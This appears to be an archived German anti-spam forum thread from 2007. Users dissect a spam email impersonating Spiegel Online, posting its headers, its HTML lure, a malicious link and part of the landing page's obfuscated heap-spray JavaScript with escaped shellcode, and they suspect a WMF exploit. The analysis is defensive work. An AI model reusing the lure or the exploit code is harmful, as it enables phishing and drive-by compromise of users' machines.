PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : SpiegelOnline Fake Spam



pixel
31.01.2007, 11:23
Bei der Rechtschreibung war ich mir allerdings nicht sicher, ob man das als deutschsprachigen Spam deklarieren kann *g*


Microsoft Mail Internet Headers Version 2.0
Received: from ip-83-2-97-100.static.xcore.pl (ip-83-2-97-100.static.xcore.pl
[83.2.97.100]) by babelfish.intra.medianetworx.de (GMS
12.01.3461/KX0677.00.11dc1039) with SMTP ID: [ID filtered]
[deleted]; Wed, 31 Jan 2007 xx:xx:xx +0100
Message-ID: [ID filtered]
Date: Wed, 31 Jan 2007 xx:xx:xx +0100
From: www.spiegel.de <Rosanne [at] nipron.com>
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: [deleted]
Subject: Schummi wiederkehrt! (spiegelonline.de)
Content-Type: multipart/alternative;
boundary="------------010000060102090900080702"
X-Antivirus: avast! (VPS 000709-0, 2007-01-30), Outbound message
X-Antivirus-Status: Clean
X-AntiSpam: Checked for restricted content by Gordano's AntiSpam Software
Return-Path: Rosanne [at] nipron.com
X-OriginalArrivalTime: 31 Jan 2007 xx:xx:xx.0074 (UTC) FILETIME=[592B01A0:01C7451C]

--------------010000060102090900080702
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

--------------010000060102090900080702
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


--------------010000060102090900080702--





<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<title>Schummi wiederkehrt! (spiegelonline.de)</title>
</head>
<body bgcolor="#ffffff" text="#000000">
<style type="text/css">
a {
color: rgb(0, 77, 207);
text-decoration: none;
}
a:hover {
color: rgb(0, 64, 128);
text-decoration: underline;
}
</style>
</head>
<body style="margin: 0; padding: 0">
<table width="50%" style="margin: 0; padding: 0">
<tr><td style="background-color: #F30B3C"><img src="http://soulrelax.net/1.gif"></td></tr>
<tr><td style="height: 10px"></td></tr>
<tr><td style="height: 15px; background-color: #F30B3C; padding: 7px; font-family: arial,Helvetica,sans-serif; font-size: 13px; font-weight: bold; color: rgb(255, 255, 255);">Lesen Sie das Internet Auslegung</td></tr>
<tr><td style="background-color: #EDEEEF; padding: 7px; font-family: arial,Helvetica,sans-serif; font-size: 14px" width="100%">
<div style="width: 50%; margin: 10 10 25 10">
Deutsche Bundesbank,Finanzchef,Finanzseite,Citibank
Nicht gekommen, um zu bleiben…*<a href="http://authorizationuser.com/spl/">[mehr...]</a>

</div>
<div style="width: 50%; margin: 10 10 25 10">
Schummi wiederkehrt !!!*<a href="http://authorizationuser.com/spl/">[mehr...]</a>
</div>
<div style="width: 50%; margin: 10 10 25 10">
Saadam Husein ist lebendig!? Interview mit Kondoliza Rais...…*<a href="http://authorizationuser.com/spl/">[mehr...]</a>
</div>
</td></tr>
<tr><td style="height: 10px; background-color: #F30B3C; padding-left: 7px; font-family: arial,Helvetica,sans-serif; font-size: 10px; font-weight: bold; color: rgb(255, 255, 255);">© 2007 Spigel Online</td></tr>
</table>
</body>
</html>

Johannes
31.01.2007, 13:41
Bei der Rechtschreibung war ich mir allerdings nicht sicher, ob man das als deutschsprachigen Spam deklarieren kann *g*


Ging mir auch so ;-)


Ich bekam den Schrott innerhalb kürzester Zeit auf drei unterchiedliche eMail-Adressen, die Absender IP's waren

212.227.126.183 und 212.227.15.40 sowie 81.169.145.151

Beispiel für einen der Header



-------- Original-Nachricht --------
From: - Wed Jan 31 xx:xx:xx 2007
X-Account-Key: account3
X-UIDL: [UID filtered]
X-Mozilla-Status: 1001
X-Mozilla-Status2: 00000000
X-Envelope-From: <Claude [at] iwon.com>
X-Envelope-To: <poor [at] spamvictim.tld>
X-Delivery-Time: 1170244465
Received: from natzeb.rzone.de (natlb3-8.rzone.de [81.169.145.151]) by mailin.webmailer.de (8.13.7/8.13.7) with ESMTP ID: [ID filtered]
Received: (from root [at] localhost) by post.webmailer.de (8.13.7/8.13.7) ID: [ID filtered]
Received: from 63.36.209.58.broad.sz.js.dynamic.163data.com.cn (63.36.209.58.broad.sz.js.dynamic.163data.com.cn [58.209.36.63] (may be forged)) by mailin.webmailer.de (8.13.7/8.13.7) with SMTP ID: [ID filtered]
Message-ID: [ID filtered]
Date: Wed, 31 Jan 2007 xx:xx:xx +0800
From: www.spiegel.de <Claude [at] iwon.com>
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: poor [at] spamvictim.tld
Subject: Schummi wiederkehrt! (spiegelonline.de)
Content-Type: multipart/alternative; boundary="------------050308070301080308050302"



Die links in dem dämlichen Text führen zu http://authorizationuser.com/spl/ *lol

homer
31.01.2007, 13:58
Ist grade auch hier eingeschlagen:
Return-Path: <Stan [at] nitco.com>
Received: from unknown (HELO admin-43z4r3kdj.ethome.net.tw) (218.35.224.13)
by 0 with SMTP; 31 Jan 2007 xx:xx:xx -0000
Received-SPF: none (0: domain at nitco.com does not designate permitted
sender hosts)
Message-ID: [ID filtered]
Date: Wed, 31 Jan 2007 20:XX:XX +0800
From: www.spiegel.de <Stan [at] nitco.com>
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: me [at] work
Subject: Schummi wiederkehrt! (spiegelonline.de)

Die Seite http://authorizationuser.com/spl/ scheint ein kleines Problem zu haben und den Content nicht volsltändig auszuliefern:

Warning: fopen(ip_all.txt): failed to open stream: Permission denied in /home/chua/public_html/spl/settings.php on line 26

Warning: fwrite(): supplied argument is not a valID: [ID filtered]

Warning: fclose(): supplied argument is not a valID: [ID filtered]

Warning: fopen(ip_firefox.txt): failed to open stream: Permission denied in /home/chua/public_html/spl/settings.php on line 26

Warning: fwrite(): supplied argument is not a valID: [ID filtered]

Warning: fclose(): supplied argument is not a valID: [ID filtered]

Auf jeden Fall wird eine Browser/IP-Statistik erstellt. Ausserdem ist da neben einem gar kryptischen Stück JavaScript auch ein seltsamer Verweis auf ein eingebettetes .wmf-File.

BTW: Kann es sein, dass der JavaScript-Decoder (http://scambaiter.info/?link=tools) nicht mit UTF-codiertem JS zurecht kommt?

Johannes
31.01.2007, 17:45
Received: from unknown (HELO admin-43z4r3kdj.ethome.net.tw) (218.35.224.13)


Na, wenigstens gehen die IP-Nummern jetzt mal weg aus D und in Richtung Asien :-)

Spamgegner
31.01.2007, 22:45
Bei mir auch eingetroffen:

Return-Path: <x>
Delivery-Date: Wed, 31 Jan 2007 xx:xx:xx +0100
Received: from good2go-bdc323e.vs.shawcable.net (70.71.171.207 [70.71.171.207])
by dm09.mta.everyone.net (EON-INBOUND) with SMTP ID: [ID filtered]
for <x>; Wed, 31 Jan 2007 xx:xx:xx -0800
Message-ID: [ID filtered]
Date: Wed, 31 Jan 2007 xx:xx:xx -0800
From: www.spiegel.de <x>
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: x
Subject: Schummi wiederkehrt! (spiegelonline.de)
Content-Type: multipart/alternative;
boundary="------------020308020409070606070800"



Ausserdem ist da neben einem gar kryptischen Stück JavaScript auch ein seltsamer Verweis auf ein eingebettetes .wmf-File.

Kann es sein, dass damit versucht wird, einen (ungepatchten) WMF-ExploID: [ID filtered]

Sirius
01.02.2007, 09:52
Ich habe den Mist auch bekommen. Die Mail kommt aus China: 61.163.216.141.
X-Apparently-To: ***@*** via 217.146.177.230; Wed, 31 Jan 2007 xx:xx:xx -0800
X-YahooFilteredBulk: 61.163.216.141
X-Originating-IP: [61.163.216.141]
Authentication-Results: mta295.mail.re4.yahoo.com from=; domainkeys=neutral (no sig)
Received: from 61.163.216.141 (HELO hn.ly.kd.adsl) (61.163.216.141)
by mta295.mail.re4.yahoo.com with SMTP; Wed, 31 Jan 2007 xx:xx:xx -0800
Date: Thu, 1 Feb 2007 xx:xx:xx +0800
From: www.spiegel.de <Dee [at] yrnet.com>
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: ***@***
Subject: Schummi wiederkehrt! (spiegelonline.de) Ich vermute, dass ein Hacker dahinter steckt, der sich Chua nennt: /home/chua/public_html/spl/...

BTW: Kann es sein, dass der JavaScript-Decoder nicht mit UTF-codiertem JS zurecht kommt?Mit den richtigen Einstellungen geht es. :)

Der JavaScript-Code soll einen Speicherüberlauf auslösen:
var s = unescape("%u4141䅁䅁䅁䅁.........");
do {
s += s;
} while (s.length < 0x0900000);

s += unescape("哫 ...."); Der Unicode besteht aus chinesischen Schriftzeichen
哫疋謼㕴͸囵皋̠㏵䧉굁ᒾ㠨瓲섈෋㯯痟廧庋̤曝ಋ譋ᱞҋ΋쏅牵浬湯搮汬䌀尺⹕硥e쀳ͤ぀౸䂋謌ᱰ训ࡀ৫䂋贴籀䂋锼躿๎ト�茄␬\闐뽐ᨶ瀯濨�诿⑔跼멒匤 탿뽝

Übersetzung:
, U.S. bolt 謼 㕴 ͸ George Gao ̠ ㏵ 䧉 굁 ᒾ 㠨 瓲 섈 ෋ 㯯 introducing 廧 foreword ̤ exposed ಋ 譋 ᱞ ҋ ΋ 쏅 led miles soup determine 汬 䌀 foot ⹕ 硥 e 쀳 ͤ ぀ ౸ 䂋 Ge Shi ᱰ training ࡀ ৫ 䂋 posted LIMITED 䂋 Rees 躿 ๎  ト �  finish ␬ \ rumbling sound 뽐 ᨶ 瀯 濨 � blamed ⑔ 跼 멒  匤 탿 뽝



Kann es sein, dass damit versucht wird, einen (ungepatchten) WMF-ExploID: [ID filtered]
WMV ist eine reine Windows-Datei. Vielleicht soll mit dem langen URL der IE zum Absturz gebracht werden.